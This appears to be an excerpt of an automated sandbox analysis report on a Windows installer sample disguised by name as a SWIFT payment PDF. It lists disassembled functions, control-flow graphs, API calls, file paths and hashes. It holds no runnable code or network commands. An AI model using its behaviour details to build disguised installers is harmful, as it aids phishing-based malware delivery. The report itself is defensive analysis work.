                                      control_flow_graph 406 405b99-405ba4 407 405ba6-405bb5 406->407 408 405bb7-405bcc 406->408 407->408 409 405bd2-405bdd 408->409 410 405dbf-405dc3 408->410 409->410 411 405be3-405bea 409->411 412 405dc9-405dd3 410->412 413 405bef-405bf9 410->413 411->410 415 405dd5-405dd9 call 405b77 412->415 416 405dde-405ddf 412->416 413->412 414 405bff-405c06 413->414 417 405db2 414->417 418 405c0c-405c41 414->418 415->416 420 405db4-405dba 417->420 421 405dbc-405dbe 417->421 422 405c47-405c52 GetVersion 418->422 423 405d5c-405d5f 418->423 420->410 421->410 424 405c54-405c58 422->424 425 405c6c 422->425 426 405d61-405d64 423->426 427 405d8f-405d92 423->427 424->425 430 405c5a-405c5e 424->430 433 405c73-405c7a 425->433 431 405d74-405d80 call 405b77 426->431 432 405d66-405d72 call 405ad5 426->432 428 405da0-405db0 lstrlenA 427->428 429 405d94-405d9b call 405b99 427->429 428->410 429->428 430->425 435 405c60-405c64 430->435 444 405d85-405d8b 431->444 432->444 437 405c7c-405c7e 433->437 438 405c7f-405c81 433->438 435->425 440 405c66-405c6a 435->440 437->438 442 405c83-405c9e call 405a5e 438->442 443 405cba-405cbd 438->443 440->433 449 405ca3-405ca6 442->449 447 405ccd-405cd0 443->447 448 405cbf-405ccb GetSystemDirectoryA 443->448 444->428 446 405d8d 444->446 450 405d54-405d5a call 405de2 446->450 452 405cd2-405ce0 GetWindowsDirectoryA 447->452 453 405d3a-405d3c 447->453 451 405d3e-405d41 448->451 454 405d43-405d47 449->454 455 405cac-405cb5 call 405b99 449->455 450->428 451->450 451->454 452->453 453->451 456 405ce2-405cec 453->456 454->450 459 405d49-405d4f lstrcatA 454->459 455->451 461 405d06-405d1c SHGetSpecialFolderLocation 456->461 462 405cee-405cf1 456->462 459->450 465 405d37 461->465 466 405d1e-405d35 SHGetPathFromIDListA CoTaskMemFree 461->466 462->461 464 405cf3-405cfa 462->464 467 405d02-405d04 464->467 465->453 466->451 466->465 467->451 467->461
                                      APIs
                                      • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,00404EBC,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000), ref: 00405C4A
                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CC5
                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CD8
                                      • SHGetSpecialFolderLocation.SHELL32(?,0078F2A8), ref: 00405D14
                                      • SHGetPathFromIDListA.SHELL32(0078F2A8,Call), ref: 00405D22
                                      • CoTaskMemFree.OLE32(0078F2A8), ref: 00405D2D
                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D4F
                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,00404EBC,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000), ref: 00405DA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 900638850-1706705762
                                      • Opcode ID: 62d675d7ba4d7dd78eb3db4cf19b3261ec8909dcb0a8e4f793d05ab03d583e6e
                                      • Instruction ID: 050506686e60d08a76f5c318217997e75ce046d50ca6fca7f220fc6f31a13d77
                                      • Opcode Fuzzy Hash: 62d675d7ba4d7dd78eb3db4cf19b3261ec8909dcb0a8e4f793d05ab03d583e6e
                                      • Instruction Fuzzy Hash: 5E61F471A04A05AAEF115F24CC88BBF3BA9EF52314F14813BE941BA2D1D27C5981DF5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405454 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 468 405454-40547a call 405712 471 405493-40549a 468->471 472 40547c-40548e DeleteFileA 468->472 474 40549c-40549e 471->474 475 4054ad-4054bd call 405b77 471->475 473 40561d-405621 472->473 476 4054a4-4054a7 474->476 477 4055cb-4055d0 474->477 483 4054cc-4054cd call 40566b 475->483 484 4054bf-4054ca lstrcatA 475->484 476->475 476->477 477->473 479 4055d2-4055d5 477->479 481 4055d7-4055dd 479->481 482 4055df-4055e7 call 405e7b 479->482 481->473 482->473 492 4055e9-4055fd call 405624 call 40540c 482->492 487 4054d2-4054d5 483->487 484->487 488 4054e0-4054e6 lstrcatA 487->488 489 4054d7-4054de 487->489 491 4054eb-405509 lstrlenA FindFirstFileA 488->491 489->488 489->491 493 4055c1-4055c5 491->493 494 40550f-405526 call 40564f 491->494 504 405615-405618 call 404e84 492->504 505 4055ff-405602 492->505 493->477 496 4055c7 493->496 501 405531-405534 494->501 502 405528-40552c 494->502 496->477 507 405536-40553b 501->507 508 405547-405555 call 405b77 501->508 502->501 506 40552e 502->506 504->473 505->481 509 405604-405613 call 404e84 call 405a2b 505->509 506->501 511 4055a0-4055b2 FindNextFileA 507->511 512 40553d-40553f 507->512 518 405557-40555f 508->518 519 40556c-405577 call 40540c 508->519 509->473 511->494 516 4055b8-4055bb FindClose 511->516 512->508 517 405541-405545 512->517 516->493 517->508 517->511 518->511 521 405561-40556a call 405454 518->521 528 405598-40559b call 404e84 519->528 529 405579-40557c 519->529 521->511 528->511 531 405590-405596 529->531 532 40557e-40558e call 404e84 call 405a2b 529->532 531->511 532->511
                                      APIs
                                      • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 0040547D
                                      • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054C5
                                      • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054E6
                                      • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054EC
                                      • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004054FD
                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AA
                                      • FindClose.KERNEL32(00000000), ref: 004055BB
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405462
                                      • "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe", xrefs: 00405454
                                      • \*.*, xrefs: 004054BF
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-3914693047
                                      • Opcode ID: a324933f258540b044efcfe334312fa73fb273d9979f8c99fd1672fc9b6fdbd7
                                      • Instruction ID: 6c887a6cd9596c43cc691a5f5e4ea67afdeb508a4c755cd09b57e0a75bcacbf5
                                      • Opcode Fuzzy Hash: a324933f258540b044efcfe334312fa73fb273d9979f8c99fd1672fc9b6fdbd7
                                      • Instruction Fuzzy Hash: 6F51C030800A04BACB21AB21CC45BBF7AB9DF42318F54817BF455B11D2D73C9A82DEAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402036 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 757 402036-40206f call 402a07 * 5 call 405691 770 402071-402073 call 402a07 757->770 771 402078-402091 CoCreateInstance 757->771 770->771 773 402171-402178 771->773 774 402097-4020ac 771->774 775 40217a-40217f call 401423 773->775 778 4020b2-4020db 774->778 779 402164-40216f 774->779 781 40289c-4028ab 775->781 782 40266d-402674 775->782 789 4020ea-4020fc 778->789 790 4020dd-4020e7 778->790 779->773 786 402184-402186 779->786 782->781 786->775 786->781 793 402110-40212a 789->793 794 4020fe-40210c 789->794 790->789 797 40215b-40215f 793->797 798 40212c-40214b MultiByteToWideChar 793->798 794->793 797->779 798->797 799 40214d-402154 798->799 800 402159 799->800 800->797
                                      APIs
                                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\straamandens\noncosmic.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                      Strings
                                      • C:\Users\user\straamandens\noncosmic.lnk, xrefs: 0040212C, 00402136, 00402152
                                      • C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy, xrefs: 004020C1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: C:\Users\user\straamandens\noncosmic.lnk$C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy
                                      • API String ID: 123533781-2511247558
                                      • Opcode ID: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                      • Instruction ID: b07af7920b8309ffd935e8952b71055f016d565fd75ec3e93ef818f940943bf4
                                      • Opcode Fuzzy Hash: 2e1ddb8780e1016394c9569cfde0881147111bc378c8489ba5f4aecf93cc6e5d
                                      • Instruction Fuzzy Hash: 91415F75A00205AFCB00DFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405E7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNELBASE(?,007A0548,outvillain\faber.div,00405755,outvillain\faber.div,outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410), ref: 00405E86
                                      • FindClose.KERNEL32(00000000), ref: 00405E92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: outvillain\faber.div
                                      • API String ID: 2295610775-1876387199
                                      • Opcode ID: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                      • Instruction ID: e3a419463b19944544fc21c9ad6669fb55d517ae4bfd2eba5619c06405e9773a
                                      • Opcode Fuzzy Hash: cc838ac162cb5096740799fdca5271843f6408794e75c0bc12259f58485ee713
                                      • Instruction Fuzzy Hash: 6AD012319195205BC3406738AC0C89F7B69DB563317304B32B5BDF12E0C2389D628AE9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405EA2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                      • LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc
                                      • String ID:
                                      • API String ID: 310444273-0
                                      • Opcode ID: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                      • Instruction ID: 2f3dee603afa82187d4e64c95529cacee06f2ec99598d25ed76f38a586475c1c
                                      • Opcode Fuzzy Hash: 054130f1168f4888e0973aa3cf4ac603bfb450dfe6f2d22fd482d5db7ed26554
                                      • Instruction Fuzzy Hash: FBE08C32A04610ABC6209B209D0896B77ACEB88B41300497EF945F6151D734AC119BBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004039B4 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 165 4039b4-4039c6 166 403b07-403b16 165->166 167 4039cc-4039d2 165->167 169 403b65-403b7a 166->169 170 403b18-403b60 GetDlgItem * 2 call 403e87 SetClassLongA call 40140b 166->170 167->166 168 4039d8-4039e1 167->168 171 4039e3-4039f0 SetWindowPos 168->171 172 4039f6-4039f9 168->172 174 403bba-403bbf call 403ed3 169->174 175 403b7c-403b7f 169->175 170->169 171->172 177 403a13-403a19 172->177 178 4039fb-403a0d ShowWindow 172->178 182 403bc4-403bdf 174->182 180 403b81-403b8c call 401389 175->180 181 403bb2-403bb4 175->181 183 403a35-403a38 177->183 184 403a1b-403a30 DestroyWindow 177->184 178->177 180->181 202 403b8e-403bad SendMessageA 180->202 181->174 187 403e54 181->187 188 403be1-403be3 call 40140b 182->188 189 403be8-403bee 182->189 193 403a3a-403a46 SetWindowLongA 183->193 194 403a4b-403a51 183->194 191 403e31-403e37 184->191 190 403e56-403e5d 187->190 188->189 198 403e12-403e2b DestroyWindow EndDialog 189->198 199 403bf4-403bff 189->199 191->187 196 403e39-403e3f 191->196 193->190 200 403af4-403b02 call 403eee 194->200 201 403a57-403a68 GetDlgItem 194->201 196->187 204 403e41-403e4a ShowWindow 196->204 198->191 199->198 205 403c05-403c52 call 405b99 call 403e87 * 3 GetDlgItem 199->205 200->190 206 403a87-403a8a 201->206 207 403a6a-403a81 SendMessageA IsWindowEnabled 201->207 202->190 204->187 235 403c54-403c59 205->235 236 403c5c-403c98 ShowWindow KiUserCallbackDispatcher call 403ea9 EnableWindow 205->236 210 403a8c-403a8d 206->210 211 403a8f-403a92 206->211 207->187 207->206 213 403abd-403ac2 call 403e60 210->213 214 403aa0-403aa5 211->214 215 403a94-403a9a 211->215 213->200 216 403adb-403aee SendMessageA 214->216 218 403aa7-403aad 214->218 215->216 217 403a9c-403a9e 215->217 216->200 217->213 221 403ac4-403acd call 40140b 218->221 222 403aaf-403ab5 call 40140b 218->222 221->200 232 403acf-403ad9 221->232 231 403abb 222->231 231->213 232->231 235->236 239 403c9a-403c9b 236->239 240 403c9d 236->240 241 403c9f-403ccd GetSystemMenu EnableMenuItem SendMessageA 239->241 240->241 242 403ce2 241->242 243 403ccf-403ce0 SendMessageA 241->243 244 403ce8-403d21 call 403ebc call 405b77 lstrlenA call 405b99 SetWindowTextA call 401389 242->244 243->244 244->182 253 403d27-403d29 244->253 253->182 254 403d2f-403d33 253->254 255 403d52-403d66 DestroyWindow 254->255 256 403d35-403d3b 254->256 255->191 258 403d6c-403d99 CreateDialogParamA 255->258 256->187 257 403d41-403d47 256->257 257->182 259 403d4d 257->259 258->191 260 403d9f-403df6 call 403e87 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 258->260 259->187 260->187 265 403df8-403e0b ShowWindow call 403ed3 260->265 267 403e10 265->267 267->191
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F0
                                      • ShowWindow.USER32(?), ref: 00403A0D
                                      • DestroyWindow.USER32 ref: 00403A21
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A3D
                                      • GetDlgItem.USER32(?,?), ref: 00403A5E
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A72
                                      • IsWindowEnabled.USER32(00000000), ref: 00403A79
                                      • GetDlgItem.USER32(?,00000001), ref: 00403B27
                                      • GetDlgItem.USER32(?,00000002), ref: 00403B31
                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403B4B
                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B9C
                                      • GetDlgItem.USER32(?,00000003), ref: 00403C42
                                      • ShowWindow.USER32(00000000,?), ref: 00403C63
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C75
                                      • EnableWindow.USER32(?,?), ref: 00403C90
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA6
                                      • EnableMenuItem.USER32(00000000), ref: 00403CAD
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC5
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD8
                                      • lstrlenA.KERNEL32(Epicurize Setup: Installing,?,Epicurize Setup: Installing,007A1F00), ref: 00403D01
                                      • SetWindowTextA.USER32(?,Epicurize Setup: Installing), ref: 00403D10
                                      • ShowWindow.USER32(?,0000000A), ref: 00403E44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID: Epicurize Setup: Installing
                                      • API String ID: 3282139019-1921106443
                                      • Opcode ID: 0c2cc5d366c93ad890157e52a419f655f0959c8ae2dd263d948fed7b28de4683
                                      • Instruction ID: 08d6703954b26bba67f61acca2d9aa754b0d4f7535d1ee947126766f28ce6238
                                      • Opcode Fuzzy Hash: 0c2cc5d366c93ad890157e52a419f655f0959c8ae2dd263d948fed7b28de4683
                                      • Instruction Fuzzy Hash: 42C1C231904200ABEB21AF25ED45E2B7EACF745706F04453EFA41B11E1C77DA982DB6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403622 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 268 403622-40363a call 405ea2 271 40363c-40364c call 405ad5 268->271 272 40364e-40367f call 405a5e 268->272 281 4036a2-4036cb call 4038e7 call 405712 271->281 277 403681-403692 call 405a5e 272->277 278 403697-40369d lstrcatA 272->278 277->278 278->281 286 4036d1-4036d6 281->286 287 403752-40375a call 405712 281->287 286->287 288 4036d8-4036f0 call 405a5e 286->288 293 403768-40378d LoadImageA 287->293 294 40375c-403763 call 405b99 287->294 292 4036f5-4036fc 288->292 292->287 295 4036fe-403700 292->295 297 40380e-403816 call 40140b 293->297 298 40378f-4037bf RegisterClassA 293->298 294->293 299 403711-40371d lstrlenA 295->299 300 403702-40370f call 40564f 295->300 311 403820-40382b call 4038e7 297->311 312 403818-40381b 297->312 301 4037c5-403809 SystemParametersInfoA CreateWindowExA 298->301 302 4038dd 298->302 306 403745-40374d call 405624 call 405b77 299->306 307 40371f-40372d lstrcmpiA 299->307 300->299 301->297 304 4038df-4038e6 302->304 306->287 307->306 310 40372f-403739 GetFileAttributesA 307->310 315 40373b-40373d 310->315 316 40373f-403740 call 40566b 310->316 321 403831-40384e ShowWindow LoadLibraryA 311->321 322 4038b4-4038b5 call 404f56 311->322 312->304 315->306 315->316 316->306 323 403850-403855 LoadLibraryA 321->323 324 403857-403869 GetClassInfoA 321->324 328 4038ba-4038bc 322->328 323->324 326 403881-4038a4 DialogBoxParamA call 40140b 324->326 327 40386b-40387b GetClassInfoA RegisterClassA 324->327 333 4038a9-4038b2 call 403572 326->333 327->326 330 4038d6-4038d8 call 40140b 328->330 331 4038be-4038c4 328->331 330->302 331->312 334 4038ca-4038d1 call 40140b 331->334 333->304 334->312
                                      APIs
                                        • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                        • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                        • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                      • lstrcatA.KERNEL32(1033,Epicurize Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Epicurize Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75EE3410,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000000), ref: 0040369D
                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\udskriftskartotek\chiromancy\refalling,1033,Epicurize Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Epicurize Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403712
